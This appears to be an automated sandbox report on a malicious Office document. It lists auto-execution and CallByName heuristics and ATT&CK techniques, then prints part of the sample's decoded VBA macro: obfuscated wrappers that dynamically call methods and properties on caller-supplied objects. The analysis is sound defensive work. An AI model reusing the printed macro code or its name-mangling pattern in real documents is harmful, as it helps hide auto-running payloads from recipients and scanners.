Verdict: MALICIOUS
Risk Score: 144

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is an Office document with detected VBA macros. The heuristic 'OLE_VBA_PCODE_AUTOEXEC_EXEC' indicates that the macro is designed to execute automatically upon opening the document, likely by using 'CreateObject' to launch a malicious payload. The presence of 'CallByName' calls further suggests dynamic execution of code.
Heuristics (6)

- Reference to Windows Script Host (high) [SC_STR_WSCRIPT]: Reference to Windows Script Host.
- VBA macros detected (medium, 2 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code.
- CallByName call (high) [OLE_VBA_CALLBYNAME]: CallByName call. Matched line in script:

      Public Sub bgDKJRS(ByVal VyRpvV As Integer, ByVal xoqaDLo As Object, ByVal qwJny As String)
          CallByName xoqaDLo, qwJny, 1
      End Sub

- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Suspicious extracted artifact (info) [EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

  Note: all five are RDF/XMP and DrawingML schema namespace identifiers that appear in ordinary document metadata; none is a contacted host, so they carry no weight in the verdict.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1740 bytes |

SHA-256: bd71e932ea238920aed8a831826d949264f1ec272a2ea065705c49afbc02b7f3
Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 39 of 61 identifiers look randomly generated (e.g. 'FnNC3zJ5JxoN2U'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script)

The extracted source consists of thin wrappers around CallByName whose object, member name and arguments are all supplied by the caller, so the target of each call is not visible here. The CallType values used map to VbMethod (1), VbGet (2) and VbLet (4): the wrappers invoke a method, read a property and write a property on whatever object is passed in.

    Attribute VB_Name = "SiovGt"

    Private Sub ClDEAxxw(ByVal IMxuPR As Boolean, ByVal UBQIToI As Integer)
        QzYClH "FnNC3zJ5JxoN2U", 8941, "rCG482M5g"
    End Sub

    Public Sub bgDKJRS(ByVal VyRpvV As Integer, ByVal xoqaDLo As Object, ByVal qwJny As String)
        CallByName xoqaDLo, qwJny, 1
    End Sub

    Public Sub uLMdQEzSM(ByVal EHhZvkvY As Variant, ByVal sZbhA As String, ByVal nQJGcyJuxH As Variant, ByVal loEiPnFEA As Object, ByVal quuPFeRPwX As Variant)
        IXNhTW = "l2VZR9nD2"
        CallByName loEiPnFEA, sZbhA, 1, EHhZvkvY, nQJGcyJuxH, quuPFeRPwX
    End Sub

    Public Function kHJDvJ(ByVal nYiINdSYPo As String, ByVal QimeyGm As Object, ByVal kKdMPKx As String) As Variant
        Dim VmKBS As Integer, bAmMXC As Integer
        Set kHJDvJ = CallByName(QimeyGm, nYiINdSYPo, 2, kKdMPKx)
    End Function

    Public Sub QavSmHwAdE(ByVal kXMXvgXM As Variant, ByVal UihLPcbp As String, ByVal LbRDnPIz As Integer, ByVal zwuHQkbdv As Variant, ByVal AvKZEdLCKg As String, ByVal ZdFxP As Object)
        CallByName ZdFxP, UihLPcbp, 1, kXMXvgXM, zwuHQkbdv
    End Sub

    Public Sub HQvScqTefi(ByVal OnIWlzab As Boolean, ByVal Jmipofj As Variant, ByVal bNiRsuvF As Object, ByVal jXGWtA As String)
        CallByName bNiRsuvF, jXGWtA, 4, Jmipofj
    End Sub

    Private Sub jIAMbLT(ByVal AEwBfCTeA As Integer, ByVal vOPGfq As Integer)
        VYZRTX "PMlVAnnZYb"
        FaPULoVT 5592, "iL2G7ATQq9s", "6nCQR9WtSsb"
    End Sub

    Public Sub lITquzHn(ByVal NIuVH As String, ByVal DGnrbz As Object, ByVal ltxCfvQYK As Integer, ByVal MWKWM As Variant, ByVal vvSEm As String)
        CallByName DGnrbz, vvSEm, 1, MWKWM
    End Sub

    Public Function JvWgrglen(ByVal xfQxkqo As String, ByVal afGcAxt As String, ByVal dJYFud As Object) As Variant
        Dim FzqRXM As Integer, UNYDxtaaT As Boolean
        JvWgrglen = CallByName(dJYFud, afGcAxt, 2)
    End Function